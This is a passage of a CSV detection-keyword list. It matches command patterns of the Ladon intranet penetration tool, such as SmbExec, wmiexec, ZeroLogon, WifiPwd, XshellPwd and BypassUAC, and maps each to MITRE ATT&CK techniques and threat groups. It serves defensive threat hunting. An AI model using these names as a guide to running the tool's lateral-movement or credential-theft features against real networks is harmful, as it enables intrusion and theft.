Runas*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon RunPS *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon sc *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon SetSignAuth*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon SmbExec *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon Sniffer*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon SshExec *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon SweetPotato*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon TcpServer *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon UdpServer*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon WebShell*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon whoami*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon WifiPwd*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon wmiexec*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon WmiExec2 *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon XshellPwd*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon ZeroLogon*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon40 BypassUAC*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon911*.ps1","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon911.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon911_*.rar*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 